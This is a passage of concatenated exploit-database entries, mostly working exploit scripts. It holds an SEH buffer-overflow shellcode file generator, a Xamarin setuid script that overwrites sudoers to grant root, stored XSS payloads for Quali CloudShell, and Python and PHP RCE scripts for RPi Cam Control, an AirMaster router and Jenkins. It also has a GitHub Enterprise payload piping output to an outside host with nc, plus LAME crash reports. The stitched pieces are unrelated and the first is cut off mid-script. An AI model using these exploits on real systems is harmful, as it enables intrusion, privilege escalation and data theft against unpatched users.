buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
#venetian
ven = "\x56" #push esi
ven += "\x41" #align
ven += "\x58" #pop eax
ven += "\x41" #align
ven += "\x05\x04\x01" #add eax,01000400
ven += "\x41" #align
ven += "\x2d\x01\x01" #add eax,01000100
ven += "\x41" #align
ven += "\x50" #push eax
ven += "\x41" #align
ven += "\xc3" #ret
buffer = head + junk + nseh + seh + ven + junk2 + buf
print len(buffer)
f=open("C:\Users\Lab\Desktop\player.m3u",'wb')
f.write(buffer)
f.close()
Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html
Abstract
Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges.
Tested versions
This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863).
Fix
Microsoft released a new version of Xamarin.iOS that addresses this issue:
- Security update for the elevation of privilege vulnerability for Xamarin.iOS: August 14, 2017 (4037359)
#!/bin/bash
# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
rm -rf ~/Library/Developer/Shared/Documentation/DocSets
cat << __EOF > /private/tmp/sudoers
%everyone ALL=(ALL) NOPASSWD: ALL
__EOF
cat << __EOF > ~/.curlrc
url=file:///private/tmp/sudoers
output=/private/etc/sudoers
__EOF
echo
echo "*** press CRL+C when the download starts ***"
$target
echo
sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
rm -f /private/tmp/sudoers ~/.curlrc
# Vulnerability type: Multiple Stored Cross Site Scripting
# Vendor: Quali
# Product: CloudShell
# Affected version: v7.1.0.6508 (Patch 6)
# Patched version: v8 and up
# Credit: Benjamin Lee
# CVE ID: CVE-2017-9767
==========================================================
# Overview
Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account.
==========================================================
# Vulnerable URL 1 (Reservation Function)
/RM/Reservation/ReserveNew
# Vulnerable parameter(s)
- Name
- Description
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Inventory" tab
- Click on details button on either of the items
- Click on the reserve button and enter the XSS payload onto the affected parameters
- Add users to the permitted user list (e.g. admin accounts)
- Once the user click on the reservation list details, the XSS would be executed
==========================================================
# Vulnerable URL 2 (Environment Function)
/RM/Topology/Update
# Vulnerable parameter(s)
- Description
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Environment" tab
- Click on item properties button
- Enter the XSS payload onto the affected parameters
- Change the owner to another user (e.g. admin accounts)
- Once the user click on the more info button of the item in the environment tab, the XSS would be executed
==========================================================
# Vulnerable URL 3 (Job Scheduling Function)
/SnQ/JobTemplate/Edit?jobTemplateId=<job template id>
# Vulnerable parameter(s)
- Name
- Description
- ExecutionBatches[0].Name
- ExecutionBatches[0].Description
- Labels
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Job Scheduling > Add New Suite" tab
- Enter the XSS payload onto the affected parameters
- Once the user view details of this suite, the XSS would be executed
==========================================================
# Vulnerable URL 4 (Resource Template Function)
/RM/AbstractTemplate/AddOrUpdateAbstractTemplate
# Vulnerable parameter(s)
- Alias
- Description
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Inventory > abstract template > Add New" tab
- Enter the XSS payload onto the affected parameters
- Once the user click on the more info button of the item, the XSS would be executed
==========================================================
# Timeline
- 06/06/2017: Vulnerability found
- 20/06/2017: Vendor informed
- 20/06/2017: Vendor responded and acknowledged
- 16/07/2017: Vendor fixed the issue
- 12/08/2017: Vendor agreed on public disclosure
- 14/08/2017: Public disclosure
#####
# RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Date 16/08/2017
# Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
#
# Proof of concept:
#####
#!/usr/bin/python
import requests
import sys
if not len(sys.argv[2:]):
print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
exit(1)
def GET(target, rfile):
res = requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
return res.content
def RCE(target, command):
requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
return GET(target,'/tmp/output.txt')
target = sys.argv[1]
command = sys.argv[2]
print RCE(target,command)
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter DOS
# Date: 13/08/17
# Exploit Author: Andy Bowden
# Vendor Homepage: http://www.tomabo.com/
# Software Link: http://www.tomabo.com/mp4-converter/index.html
# Version: 3.19.15
# Tested on: Windows 7 x86
# CVE : None
#Generate a .m3u file using the python script and import it into the MP4 Converter.
file = "crash.m3u"
buffer = "A" * 550000
f = open(file, "w")
f.write(buffer)
f.close()
<?php
# Exploit Title: AirMaster 3000M multiple Vulnerabilities
# Date: 2017/08/12
# Exploit Author: Koorosh Ghorbani
# Author Homepage: http://8thbit.net/
# Vendor Homepage: http://mobinnet.ir/
# Software Version: V2.0.1B1044
# Web Server: GoAhead-Webs/2.5.0
define('isDebug',false);
define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
function changePassword(){
$pw = "1234"; //New Password
$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
specialCookie,
'Origin: http://192.168.1.1',
'Content-Type: application/x-www-form-urlencoded',
));
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$response = curl_exec($ch);
if($response == "success"){
echo "New Password is : $pw\r\n";
}else{
echo "Failed\r\n";
}
if (isDebug){
echo $response;
}
}
function executeCommand(){
$data = "pingAddr=`cat /etc/passwd`";
$ch = curl_init('http://192.168.1.1/goform/startPing');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
specialCookie,
'Origin: http://192.168.1.1',
'Content-Type: application/x-www-form-urlencoded',
"X-Requested-With: XMLHttpRequest",
"Referer: http://192.168.1.1/diagnosis_ping.asp"
));
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$response = curl_exec($ch);
echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
}
changePassword();
import random
import string
from decimal import Decimal
import requests
from requests.exceptions import RequestException
# Exploit Title: Jenkins CVE-2016-0792 Deserialization Remote Exploit
# Google Dork: intitle: "Dashboard [Jenkins]" + "Manage Jenkins"
# Date: 30-07-2017
# Exploit Author: Janusz Piechówka
# Github: https://github.com/jpiechowka/jenkins-cve-2016-0792
# Vendor Homepage: https://jenkins.io/
# Version: Versions before 1.650 and LTS before 1.642.2
# Tested on: Debian
# CVE : CVE-2016-0792
def prepare_payload(command):
splitCommand = command.split()
preparedCommands = ''
for entry in splitCommand:
preparedCommands += f'<string>{entry}</string>'
xml = f'''
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando"/>
<owner class="java.lang.ProcessBuilder">
<command>{preparedCommands}</command>
</owner>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>'''
return xml
def exploit(url, command):
print(f'[*] STARTING')
try:
print(f'[+] Trying to exploit Jenkins running at address: {url}')
# Perform initial URL check to see if server is online and returns correct response code using HEAD request
headResponse = requests.head(url, timeout=30)
if headResponse.status_code == requests.codes.ok:
print(f'[+] Server online and responding | RESPONSE: {headResponse.status_code}')
# Check if X-Jenkins header containing version is present then proceed
jenkinsVersionHeader = headResponse.headers.get('X-Jenkins')
if jenkinsVersionHeader is not None:
# Strip version after second dot from header to perform conversion to Decimal
stripCharacter = "."
strippedVersion = stripCharacter.join(jenkinsVersionHeader.split(stripCharacter)[:2])
# Perform basic version check
if Decimal(strippedVersion) < 1.650:
print(f'[+] Jenkins version: {Decimal(strippedVersion)} | VULNERABLE')
# Prepare payload
payload = prepare_payload(command)
# Prepare POST url
randomJobName = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8))
if url.endswith('/'):
postUrl = f'{url}createItem?name={randomJobName}'
else:
postUrl = f'{url}/createItem?name={randomJobName}'
print(f'[+] Will POST to {postUrl}')
# Try to execute passed command
postResponse = requests.post(postUrl, data=payload, headers={'Content-Type': 'application/xml'})
print(f'[+] Exploit launched ')
# 500 response code is ok here
print(f'[+] Response code: {postResponse.status_code} ')
if postResponse.status_code == 500:
print('[+] SUCCESS')
else:
print('[-][ERROR] EXPLOIT LAUNCHED, BUT WRONG RESPONSE CODE RETURNED')
else:
print(f'[-][ERROR] Version {Decimal(strippedVersion)} is not vulnerable')
else:
print(f'[-][ERROR] X-Jenkins header not present, check if Jenkins is actually running at {url}')
else:
print(f'[-][ERROR] {url} Server did not return success response code | RESPONSE: {headResponse.status_code}')
except RequestException as ex:
print(f'[-] [ERROR] Request exception: {ex}')
print('[*] FINISHED')
#!/usr/bin/python
from urllib import quote
''' set up the marshal payload from IRB
code = "`id | nc orange.tw 12345`"
p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult"
'''
marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
payload = [
'',
'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
marshal_code,
'',
''
]
payload = map(quote, payload)
url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/'
print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org"
print '-'*10 + '\n'
print url + '%0D%0A'.join(payload)
print '''
Inserting WebHooks from:
https://ghe-server/:user/:repo/settings/hooks
Triggering RCE from:
https://ghe-server/search?q=ggggg&type=Repositories
'''
LAME multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Following the great history of GNU naming, LAME originally stood for LAME Ain't an Mp3 Encoder.
LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3.
Affected version:
=====
3.99.5
Vulnerability Description:
==========================
1.
the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file.
./lame lame_3.99.5_heap_buffer_overflow.wav out
==26618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000009f08 at pc 0x5f3a1e bp 0x7ffdfaf74620 sp 0x7ffdfaf74618
READ of size 4 at 0x60c000009f08 thread T0
#0 0x5f3a1d in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606
#1 0x5f3a1d in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7ff8c8771f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
0x60c000009f08 is located 8 bytes to the right of 128-byte region [0x60c000009e80,0x60c000009f00)
allocated by thread T0 here:
#0 0x46ba59 in calloc (/home/a/Downloads/lame-3.99.5/frontend/lame+0x46ba59)
#1 0x5f1302 in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:561
#2 0x5f1302 in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 fill_buffer_resample
Shadow bytes around the buggy address:
0x0c187fff9390: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff93a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff93c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff93d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff93e0: fa[fa]fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff93f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff9400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff9410: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff9420: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff9430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==26618==ABORTING
POC:
lame_3.99.5_heap_buffer_overflow.wav
CVE:
CVE-2017-9410
2.
the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
./lame lame_3.99.5_invalid_memory_read_1.wav out
==30841==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005f24ed sp 0x7ffee94d3050 bp 0x000000000000 T0)
#0 0x5f24ec in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608
#1 0x5f24ec in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7f48b8cacf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 fill_buffer_resample
==30841==ABORTING
POC:
lame_3.99.5_invalid_memory_read_1.wav
CVE:
CVE-2017-9411
3.
the unpack_read_samples function in frontend/get_audio.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
./lame lame_3.99.5_invalid_memory_read_2.wav out
(gdb) r
Starting program: lame file out
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x080f27b3 in unpack_read_samples (samples_to_read=-146880,
bytes_per_sample=<optimized out>, swap_order=-2088828928,
pcm_in=0xb6303d80, sample_buffer=<optimized out>) at get_audio.c:1204
1204 GA_URS_IFLOOP(1)
(gdb) disassemble 0x080f27b3,0x080f27ff
Dump of assembler code from 0x80f27b3 to 0x80f27ff:
=> 0x080f27b3 <get_audio_common+4051>:mov 0x20000000(%eax),%al
0x080f27b9 <get_audio_common+4057>:test %al,%al
0x080f27bb <get_audio_common+4059>:je 0x80f27d0 <get_audio_common+4080>
0x080f27bd <get_audio_common+4061>:mov $0x8320b78,%edx
0x080f27c2 <get_audio_common+4066>:and $0x7,%edx
0x080f27c5 <get_audio_common+4069>:add $0x3,%edx
0x080f27c8 <get_audio_common+4072>:cmp %al,%dl
0x080f27ca <get_audio_common+4074>:jge 0x80f6715 <get_audio_common+20277>
0x080f27d0 <get_audio_common+4080>:xor $0xf879,%ebx
0x080f27d6 <get_audio_common+4086>:add 0x8320b78,%ebx
0x080f27dc <get_audio_common+4092>:mov %ebx,%eax
0x080f27de <get_audio_common+4094>:shr $0x3,%eax
0x080f27e1 <get_audio_common+4097>:mov 0x20000000(%eax),%al
0x080f27e7 <get_audio_common+4103>:test %al,%al
0x080f27e9 <get_audio_common+4105>:je 0x80f27f8 <get_audio_common+4120>
0x080f27eb <get_audio_common+4107>:mov %ebx,%edx
0x080f27ed <get_audio_common+4109>:and $0x7,%edx
0x080f27f0 <get_audio_common+4112>:cmp %al,%dl
0x080f27f2 <get_audio_common+4114>:jge 0x80f6727 <get_audio_common+20295---Type <return> to continue, or q <return> to quit---
0x080f27f8 <get_audio_common+4120>:incb (%ebx)
0x080f27fa <get_audio_common+4122>:movl $0x7c3c,%gs%edi)
End of assembler dump.
(gdb) i r
eax 0x837f0000-2088828928
ecx 0x24489288
edx 0xbfee5e20-1074897376
ebx 0x7c3c31804
esp 0xbfee4c200xbfee4c20
ebp 0xbfee82780xbfee8278
esi 0xfffffcf2-782
edi 0xfffffffc-4
eip 0x80f27b30x80f27b3 <get_audio_common+4051>
eflags 0x10246[ PF ZF IF RF ]
cs 0x73115
ss 0x7b123
ds 0x7b123
es 0x7b123
fs 0x00
gs 0x3351
(gdb) x/20x 0x837f0000
0x837f0000:Cannot access memory at address 0x837f0000
POC:
lame_3.99.5_invalid_memory_read_2.wav
CVE:
CVE-2017-9412
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42390.zip